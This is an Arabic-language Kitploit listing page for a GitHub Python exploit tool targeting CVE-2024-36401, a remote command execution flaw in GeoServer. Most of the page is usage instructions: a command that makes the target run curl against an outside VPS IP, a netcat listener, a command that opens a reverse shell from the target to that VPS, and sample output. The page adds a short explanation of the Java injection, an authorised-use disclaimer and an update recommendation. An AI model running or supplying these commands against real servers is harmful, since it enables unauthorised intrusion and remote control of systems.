Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36401 — استغلال Python لـ "GeoServer" | Kitploit
أدوات/GitHubGitHub/urjack2025/cve-2024-36401
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHuburjack2025/cve-2024-36401

CVE-2024-36401

استغلال Python لـ "GeoServer"

عرض المستودع
21منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال ثغرة CVE-2024-36401 في GeoServer

ملخص الثغرة

CVE-2024-36401 هي ثغرة تنفيذ أوامر عن بُعد في GeoServer، حيث يمكن للمهاجم تنفيذ أوامر عشوائية دون إذن من خلال إنشاء طلبات WFS (خدمة الميزات الجغرافية) محددة.

المتطلبات البيئية

  • Python 3.x
  • تثبيت التبعيات الضرورية: pip install requests

طريقة الاستخدام

تدعم الأداة وضعين: وضع cmd (تنفيذ الأوامر مباشرة) ووضع reverse (إنشاء شل ارتدادي).

1. اختبار ما إذا كان الهدف متصلاً بالإنترنت

افترض أن عنوان VPS هو 111.46.112.85، استخدم وضع cmd لتنفيذ أمر curl لاختبار ما إذا كان الخادم الهدف يمكنه الوصول إلى الشبكة الخارجية:

root@kitploit:~
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"

طريقة التحقق: ابدأ خادم HTTP على VPS لاستقبال الطلبات

root@kitploit:~
# 在 VPS 上执行
python -m http.server 8090

إذا تم استقبال معلومات الإرجاع بنجاح، سترى مخرجات مشابهة لما يلي:

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -

2. إنشاء اتصال شل ارتدادي

استخدم وضع reverse لإنشاء شل ارتدادي يتصل بـ VPS والمنفذ المحددين:

الخطوة 1: قم بإعداد منفذ استماع على VPS

root@kitploit:~
# 在 VPS 上执行
nc -lvp 6666

الخطوة 2: قم بتشغيل أداة الاستغلال لبدء الاتصال الارتدادي

root@kitploit:~
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666

بعد التنفيذ، ستظهر الأداة مخرجات مشابهة لما يلي:

root@kitploit:~
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea

في هذه المرحلة، إذا نجح الاستغلال، فسيستقبل مستمع nc على VPS جلسة الشل الارتدادية.

شرح معلمات الأداة

root@kitploit:~
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
  • cmd: وضع تنفيذ أمر واحد
  • reverse: وضع الشل الارتدادي
  • <target>: عنوان الخادم الهدف والمنفذ، الصيغة ip:port
  • <command>: الأمر المراد تنفيذه على الخادم الهدف
  • <vps_ip>: عنوان IP الخاص بخادم VPS
  • <vps_port>: رقم المنفذ المستمع على VPS

مبدأ الثغرة

تستغل هذه الثغرة عيبًا أمنيًا في خدمة WFS في GeoServer عن طريق حقن كود Java في valueReference لتنفيذ أوامر النظام. تقوم الأداة بإنشاء حمولة XML تحتوي على كود ضار وإرسالها إلى واجهة WFS في GeoServer، مما يتيح تنفيذ الأوامر عن بُعد.

ملاحظات مهمة

  1. هذه الأداة مخصصة فقط للبحث الأمني والتحقق من الثغرات، ولا تستخدمها في اختبارات غير مصرح بها.
  2. أي عواقب ناتجة عن استخدام هذه الأداة تقع على عاتق المستخدم.
  3. عند استخدام وظيفة الشل الارتدادي، تأكد من أن لديك الإذن للوصول إلى النظام الهدف وأنك تعمل ضمن حدود القوانين واللوائح ذات الصلة.
  4. إذا كانت بيئة اختبار (ميدان رماية)، فقد يقوم منشئ الميدان بتعديل بعض المسارات الافتراضية لزيادة الصعوبة، مما يؤدي إلى عدم عمل الـ EXP. في هذه الحالة، قد تحتاج إلى تعديل الحقل /geoserver/wfs إلى المحتوى المناسب.

توصيات الإصلاح

قم بتحديث GeoServer بانتظام إلى الإصدارات الأمنية الرسمية، واتبع أفضل الممارسات الأمنية لتكوين الخادم.

تنزيل الأداة